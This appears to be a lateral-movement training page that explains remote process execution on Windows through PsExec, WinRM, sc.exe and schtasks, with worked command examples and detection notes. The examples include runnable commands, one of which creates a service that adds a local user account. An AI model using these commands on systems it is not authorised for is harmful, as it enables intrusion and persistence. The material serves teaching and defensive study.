Spawning Processes Remotely
PRACTICE ! PRACTICE ! PRACTICE !
Ports => 445/TCP (SMB)
Required Group Memberships => Administrators
PsExec (the traditional method), from the Sysinternals suite, has long been the go-to tool for executing processes remotely. It works in three steps:
Connect to the ADMIN$ share (which maps to C:\Windows) and upload a service binary; PsExec uses psexesvc.exe as the file name
Connect to the Service Control Manager to create and start a service named PSEXESVC whose binary path is C:\Windows\psexesvc.exe
Create named pipes over SMB to relay stdin/stdout/stderr between our client and the remote process
To run PsExec, we only need the credentials of a local administrator on the remote host and the command we want to run. Both the ADMIN$ upload and the service creation require administrative rights, which is why plain users cannot use this method
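The PsExec flow described above, as an added example that is not part of the original page: one interactive and one non-interactive invocation, followed by a query for the artifact the default service name leaves on the target. The host name `target.lab.local`, the credentials and the location of `PsExec64.exe` are assumptions; PsExec is the real Sysinternals tool and the flags used are its documented ones.

```powershell
# Added example (not from the original page). Assumptions: the target is reachable as
# 'target.lab.local' over 445/TCP, 'Administrator' is a local admin there, and PsExec64.exe
# (Sysinternals) sits in the current directory. Host and password are placeholders.
$Target = 'target.lab.local'

# -accepteula suppresses the EULA prompt, -i attaches to an interactive session on the
# remote console. Adding -s would run the process as SYSTEM instead of the supplied account.
.\PsExec64.exe -accepteula \\$Target -u Administrator -p 'Passw0rd1' -i cmd.exe

# Non-interactive: run one command; stdout comes back to us through the SMB named pipes
.\PsExec64.exe -accepteula \\$Target -u Administrator -p 'Passw0rd1' cmd.exe /c "whoami /all"

# Artifact check (defender's view): the SCM logs every service installation as System event 7045,
# so the default PSEXESVC service shows up there with its binary path C:\Windows\PSEXESVC.exe.
# Querying a remote event log uses the Event Log RPC service, which must also be reachable.
Get-WinEvent -ComputerName $Target -FilterHashtable @{ LogName = 'System'; Id = 7045 } |
    Where-Object { $_.Message -match 'PSEXESVC' } |
    Select-Object TimeCreated, Message
```

PsExec's `-r` option lets the operator pick a different service name, so the 7045 filter on `PSEXESVC` only catches default usage; a detection that keys on any 7045 event whose binary path is `%SystemRoot%\<name>.exe` uploaded moments earlier over ADMIN$ is more robust.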
Ports => 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)
Required Group Memberships => Remote Management Users (or Administrators)
Windows Remote Management (WinRM) is Microsoft's implementation of WS-Management, an HTTP/SOAP-based protocol used to send PowerShell commands to Windows hosts remotely
Windows Server installations (since Server 2012) have WinRM enabled by default, making it an attractive lateral movement vector
We can open a remote shell over WinRM directly from a command prompt, using the credentials of the current user
We can achieve the same from PowerShell, but to pass different credentials, we first need to create a PSCredential object
Once we have our PSCredential object, we can create an interactive session with the Enter-PSSession cmdlet
PowerShell also includes the Invoke-Command cmdlet, which runs ScriptBlocks remotely via WinRM and returns the output as objects. Credentials must be passed through a PSCredential object here as well
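The WinRM paths described above, as an added example that is not code from the original page: a command-prompt shell, then the PSCredential, Enter-PSSession and Invoke-Command steps, plus the TrustedHosts caveat that most often breaks the connection in a lab. The target name `target.lab.local`, the account `LAB\operator` and its password are assumptions.

```powershell
# Added example (not from the original page). Assumptions: 'target.lab.local' listens on
# 5985/TCP and 'LAB\operator' is in its Remote Management Users (or Administrators) group.
$Target = 'target.lab.local'

# 1. From a plain command prompt: winrs.exe (built into Windows) gives a remote cmd.exe over WinRM.
#    Works from cmd.exe or PowerShell; the -r: (remote), -u: and -p: switches are winrs's own.
winrs.exe "-r:$Target" -u:LAB\operator -p:Passw0rd1 cmd

# 2. From PowerShell with alternate credentials: build the PSCredential object first.
$Password   = ConvertTo-SecureString 'Passw0rd1' -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential ('LAB\operator', $Password)

# Interactive session; type 'exit' to return to the local shell.
Enter-PSSession -ComputerName $Target -Credential $Credential

# 3. Non-interactive: Invoke-Command runs the ScriptBlock remotely and returns the results,
#    so, unlike sc.exe or schtasks, nothing is lost.
Invoke-Command -ComputerName $Target -Credential $Credential -ScriptBlock {
    whoami
    Get-LocalGroupMember -Group 'Remote Management Users'
}

# The ScriptBlock runs on the remote host and cannot see local variables;
# values have to be passed explicitly with -ArgumentList.
Invoke-Command -ComputerName $Target -Credential $Credential -ArgumentList 'C:\Windows\Temp' -ScriptBlock {
    param($Dir)
    Get-ChildItem -Path $Dir
}

# Caveat: when the client is not domain-joined, or the target is given by IP address, the WinRM
# client refuses to authenticate over HTTP unless the target is in TrustedHosts (or 5986/HTTPS is used):
# Set-Item WSMan:\localhost\Client\TrustedHosts -Value $Target -Concatenate
```

Membership in Remote Management Users grants a remoting session but not local admin; commands that need elevation on the target (creating users, installing services) will still fail there unless the account is also in the local Administrators group.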
Ports
135/TCP, 49152-65535/TCP (DCE/RPC)
445/TCP (RPC over SMB Named Pipes)
139/TCP (RPC over SMB Named Pipes)
Required Group Memberships => Administrators
Windows services can also be leveraged to run arbitrary commands, since the Service Control Manager executes the configured binary when the service is started. A real service executable is technically different from a regular application (it has to register with the SCM), but if we configure a service to point at any application, the SCM will still launch it; the command runs, and the SCM then reports a start failure once the process exits without checking in
We can create a service on a remote host with sc.exe, a standard tool available in every Windows installation. It will try to connect to the Service Control Manager (SVCCTL) remote service program through RPC in several ways
First, a connection attempt is made using DCE/RPC directly over TCP
The client connects to the Endpoint Mapper (EPM) on port 135, which serves as a catalogue of available RPC endpoints, and requests information on the SVCCTL service program
The EPM responds with the IP and port to connect to for SVCCTL, which is usually a dynamic port in the range 49152-65535
If that connection fails, sc.exe falls back to reaching SVCCTL through SMB named pipes, either on port 445 (SMB) or 139 (SMB over NetBIOS)
We can create and start a service named "NxGservice" on the remote host with the create and start subcommands of sc.exe
The net user command is executed when the service is started, creating a new local user on the system
Since the operating system is in charge of starting the service, we won't be able to see the command's output; sc.exe only reports the SCM's start result, which is an error because net.exe is not a real service binary
To stop and delete the service afterwards, we use the stop and delete subcommands of sc.exe
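The sc.exe sequence just described, as an added example (not commands from the original page): create, start, verify the effect through another channel, then stop and delete. The host `target.lab.local` and the user name and password created by the service are assumptions; the sc.exe subcommands and syntax quirks are the real tool's.

```powershell
# Added example (not from the original page). Assumptions: 'target.lab.local' is reachable
# on 135/445 TCP and the current user is a local administrator there. 'nxguser' and its
# password are placeholders for whatever the 'net user' command is meant to create.
$Target = 'target.lab.local'

# In PowerShell 'sc' is an alias for Set-Content, so the .exe extension is mandatory.
# sc.exe also requires a space AFTER 'binPath=' and 'start=' (and none before).
sc.exe \\$Target create NxGservice binPath= "net user nxguser Passw0rd1 /add" start= demand

# The SCM launches net.exe, 'net user' runs and exits, and because the process never called
# StartServiceCtrlDispatcher the SCM reports error 1053 ("did not respond ... in a timely
# fashion"). The error is expected; the command has already executed by then.
sc.exe \\$Target start NxGservice

# No stdout comes back, so confirm the side effect through a channel that does return output.
sc.exe \\$Target qc NxGservice                       # shows the BINARY_PATH_NAME we set
Invoke-Command -ComputerName $Target -ScriptBlock { Get-LocalUser -Name 'nxguser' }  # assumes WinRM reachable

# Clean up. The service is already stopped (it failed to start), so 'stop' may just report
# error 1062 "The service has not been started"; 'delete' is what removes the registration.
sc.exe \\$Target stop NxGservice
sc.exe \\$Target delete NxGservice
```

On the target, the creation is recorded as System event 7045 (and Security 4697 if "Audit Security System Extension" is enabled), both carrying the `binPath` string verbatim; a service whose binary path is `net user ... /add` is an obvious detection rule.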
Another Windows feature we can abuse is Scheduled Tasks
We can create and run one remotely with schtasks, available in any Windows installation, using its /create and /run switches; here we create a task named NxGtask1
We set the schedule type (/sc) to ONCE, which means the task is intended to be run only once at the specified time and date
Since we will be running the task manually, the starting date (/sd) and starting time (/st) won't matter much anyway
Since the system will run the scheduled task, the command's output won't be available to us, making this a blind attack
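The schtasks procedure described above, as an added example that is not from the original page. Because the task's output is never returned, the example also redirects it to a file on the target and reads it back over the ADMIN$ share, which is an addition to the page's steps; the host `target.lab.local`, the command run and the file path are assumptions, while the schtasks switches are the real tool's.

```powershell
# Added example (not from the original page). Assumptions: 'target.lab.local' is reachable
# over 445/TCP and the current user is a local administrator there. The task name, the
# command and the output path are placeholders.
$Target = 'target.lab.local'

# /sc ONCE with a start date in the past: the schedule is irrelevant since we trigger the task
# ourselves with /run. /ru SYSTEM runs the command as LocalSystem. The /sd format follows the
# TARGET's locale (MM/DD/YYYY on en-US systems); schtasks only warns that the time has passed.
# Wrapping the command in 'cmd.exe /c ... > file' is how we get around the blind execution.
schtasks /s $Target /create /tn NxGtask1 /ru SYSTEM /sc ONCE /sd 01/01/1970 /st 00:00 `
    /tr "cmd.exe /c whoami /all > C:\Windows\Temp\NxGtask1.txt"

schtasks /s $Target /run /tn NxGtask1

# /query /v shows Status and "Last Result" (the exit code) so we know when the task has finished
schtasks /s $Target /query /tn NxGtask1 /v /fo LIST

# Read the redirected output back through the administrative share (ADMIN$ = C:\Windows)
Get-Content "\\$Target\ADMIN$\Temp\NxGtask1.txt"

# Remove the task (/f suppresses the confirmation prompt) and the output file
schtasks /s $Target /delete /tn NxGtask1 /f
Remove-Item "\\$Target\ADMIN$\Temp\NxGtask1.txt"
```

On the target, task creation and deletion are logged as Security events 4698 and 4699 (when object access auditing for the task scheduler is enabled) and in the Microsoft-Windows-TaskScheduler/Operational log; the /tr command line appears in those events, so the redirect to a file is also what a defender would see.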